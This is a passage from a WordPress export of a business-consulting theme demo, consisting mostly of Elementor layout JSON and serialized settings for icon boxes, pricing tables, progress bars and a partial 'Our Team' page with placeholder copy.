More","is_border":"","icon_size":{"unit":"px","size":40,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"6d55426","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"6c42f1a","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":650},"library":"svg"},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Learn More","is_border":"","icon_size":{"unit":"px","size":38,"sizes":[]}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"ccfedc3","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"cd58237","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"5bc1f0b","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Consulting","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":32,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"b140664","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"ab511b8","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/clock.svg","id":659},"library":"svg"},"title":"Planning","des":"We\u2019ve beven a strategy thought leader for nearly five decades","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":35,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding":{"unit":"px","top":"30","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"29f766a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"ad7d79d","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/aim.svg","id":660},"library":"svg"},"title":"Strategy","des":"We\u2019ve been a strategy tmhought leader for nearly five decades","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":35,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"3bd1a3a","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"5ff8069","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/money.svg","id":663},"library":"svg"},"title":"Support","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":36,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding":{"unit":"px","top":"30","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"0422c24","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"4893536","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"6a60a09","elType":"widget","settings":{"box_style":"s2","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":1413},"library":"svg"},"title":"Audit and Assurance","des":"Discover the emerging technologies most relevant to your strategy by working with our community.","icon_size":{"unit":"px","size":43,"sizes":[]},"icon_color":"#FFFFFF","icon_bg":"#FF8F3E","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":21,"sizes":[]},"title_typography_font_weight":"600","des_color":"#60626D","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"9089712","elType":"column","settings":{"_column_size":50,"_inline_size":null},"elements":[{"id":"ea9b75f","elType":"widget","settings":{"box_style":"s2","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/portfolio.svg","id":666},"library":"svg"},"title":"Gross Tax Planning","des":"Discover the emerging technologies most relevant to your strategy by working with our community.","icon_color":"#FFFFFF","icon_bg":"#FF8F3E","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":21,"sizes":[]},"title_typography_font_weight":"600","des_color":"#60626D"},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true},{"id":"4c25bc2","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"596b78b","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"698ffdc","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bars-chart.svg","id":1413},"library":"svg"},"title":"Marketing Research","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"","is_line":"","box_padding":{"unit":"px","top":"50","right":"25","bottom":"42","left":"25","isLinked":false},"bg_hover_icon_bg":"#FFFFFF1A","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#CCCCCC","is_border":"","icon_space":{"unit":"px","size":26,"sizes":[]},"icon_size":{"unit":"px","size":38,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":16,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"eb94e32","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"be4a619","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/rocket.svg","id":1414},"library":"svg"},"title":"\u041erganizational Audit","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"","is_line":"","box_padding":{"unit":"px","top":"50","right":"25","bottom":"42","left":"25","isLinked":false},"bg_hover_icon_bg":"#FFFFFF1A","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#CCCCCC","is_border":"","icon_space":{"unit":"px","size":26,"sizes":[]},"icon_size":{"unit":"px","size":40,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":16,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"bbe4b35","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"8c33540","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":650},"library":"svg"},"title":"Business Consulting","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"","is_line":"","box_padding":{"unit":"px","top":"50","right":"25","bottom":"42","left":"25","isLinked":false},"bg_hover_icon_bg":"#FFFFFF1A","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#CCCCCC","is_border":"","icon_space":{"unit":"px","size":26,"sizes":[]},"icon_size":{"unit":"px","size":38,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","title_typography_typography":"custom","title_typography_font_family":"Inter","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":16,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"82fa562","elType":"widget","settings":{"title":"Progress Bars","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"37788eb","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"5249351","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"0","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a17e202","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"},{"id":"7213754","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"},{"id":"173ab3c","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"e4501d0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"content_position":"center","align":"space-evenly","_ot_content_align":"horizontal"},"elements":[{"id":"6e13157","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"},{"id":"712f4c6","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"a0928a2","elType":"widget","settings":{"title":"Pricing Tables","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4b24f46","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3254d38","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"01efe9e","elType":"widget","settings":{"title":"basic plan","price":"<sup>$<\/sup> 699","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li>Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"16a9414","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"15b3e04","elType":"widget","settings":{"is_featured":"yes","title":"ultra plan","price":"<sup>$<\/sup> 799","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"26f11eb","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"25be18a","elType":"widget","settings":{"title":"pro plan","price":"<sup>$<\/sup> 899","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li class=\"active\">Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true}],"isInner":true},{"id":"d184df3","elType":"widget","settings":{"title":"Flip Boxes","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0457628","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"08202ed","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a0f08f5","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box1.jpg","id":533},"number":"01","title":"Client Learning Programs","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"0ed39b4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a2601a1","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box2.jpg","id":534},"number":"02","title":"Partnership Ecosystem","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"ec866a8","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"77a09fc","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box3.jpg","id":535},"number":"03","title":"New Business Innovation","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More"},"elements":[],"widgetType":"iflip_box"}],"isInner":true}],"isInner":true},{"id":"23a755c","elType":"widget","settings":{"title":"Service Boxes","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"611b0b8","elType":"section","settings":{"gap":"extended","structure":"30","layout":"full_width"},"elements":[{"id":"38c3fac","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"b22c2fd","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box1.jpg","id":902},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)","label_link":"Explore More","box_bg":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"9039823","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f7959fa","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box2.jpg","id":903},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","label_link":"Explore More","box_bg":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"87c6b1c","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"417a646","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box3.jpg","id":904},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","label_link":"Explore More","box_bg":"#FFFFFF","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iimage_box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:10:{s:7:"heading";a:3:{s:5:"count";i:5;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:5;s:11:"header_size";i:5;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:5;}}}}s:13:"iiconbox_grid";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"icon_boxes";i:1;s:5:"align";i:1;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:9:"icon_size";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:9:"iiconbox2";a:3:{s:5:"count";i:5;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"icon_font";i:5;s:5:"title";i:5;s:3:"des";i:5;s:9:"box_style";i:2;}}s:5:"style";a:3:{s:18:"style_icon_section";a:1:{s:9:"icon_size";i:4;}s:17:"style_box_section";a:3:{s:10:"icon_color";i:2;s:7:"icon_bg";i:2;s:9:"des_color";i:2;}s:21:"style_content_section";a:4:{s:27:"title_typography_typography";i:2;s:28:"title_typography_font_family";i:2;s:26:"title_typography_font_size";i:2;s:28:"title_typography_font_weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:27;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:5:{s:12:"_inline_size";i:27;s:19:"_inline_size_tablet";i:21;s:16:"content_position";i:1;s:5:"align";i:1;s:17:"_ot_content_align";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:13:"margin_tablet";i:7;s:13:"margin_mobile";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:10;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:2:{s:14:"section_layout";a:2:{s:3:"gap";i:9;s:6:"layout";i:9;}s:17:"section_structure";a:1:{s:9:"structure";i:9;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:9;s:14:"padding_mobile";i:3;}}}}s:9:"iiconbox1";a:3:{s:5:"count";i:10;s:15:"control_percent";i:10;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:9:"icon_font";i:10;s:5:"title";i:10;s:3:"des";i:10;s:5:"align";i:4;s:8:"btn_text";i:7;}}s:5:"style";a:3:{s:18:"style_icon_section";a:8:{s:9:"is_border";i:10;s:9:"icon_size";i:10;s:10:"icon_space";i:7;s:13:"icon_bg_width";i:7;s:10:"radius_box";i:3;s:7:"icon_bg";i:3;s:27:"icon_shadow_box_shadow_type";i:3;s:22:"icon_shadow_box_shadow";i:3;}s:17:"style_box_section";a:7:{s:7:"is_line";i:7;s:11:"box_padding";i:7;s:16:"bg_hover_icon_bg";i:7;s:18:"bg_hover_des_color";i:7;s:33:"hover_icon_shadow_box_shadow_type";i:3;s:28:"hover_icon_shadow_box_shadow";i:3;s:20:"bg_hover_title_color";i:3;}s:21:"style_content_section";a:9:{s:27:"title_typography_typography";i:7;s:26:"title_typography_font_size";i:7;s:28:"title_typography_font_weight";i:7;s:9:"des_color";i:7;s:25:"des_typography_typography";i:7;s:26:"des_typography_font_family";i:7;s:24:"des_typography_font_size";i:7;s:28:"title_typography_font_family";i:6;s:11:"title_color";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_tablet";i:8;s:8:"_padding";i:2;s:15:"_padding_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:5;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:5:"title";i:5;s:7:"percent";i:5;s:9:"bar_style";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:4;s:15:"_padding_tablet";i:3;}}}}s:13:"ipricingtable";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:5:{s:5:"title";i:3;s:5:"price";i:3;s:9:"price_for";i:3;s:7:"details";i:3;s:11:"is_featured";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:2;}}}}s:9:"iflip_box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"image_box";i:3;s:6:"number";i:2;s:5:"title";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:2;}}}}s:10:"iimage_box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"image_box";i:3;s:5:"title";i:2;s:3:"des";i:2;}}s:5:"style";a:1:{s:21:"style_content_section";a:2:{s:6:"box_bg";i:3;s:10:"radius_box";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:15:"_padding_tablet";i:2;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Team</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-team/</link>
		<pubDate>Wed, 09 Sep 2020 09:37:48 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=690</guid>
		<description></description>
		<content:encoded><![CDATA[our team	        <h3>Our Skilled Leaders</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Monica Black</h6>				chief communication officer			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team2-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
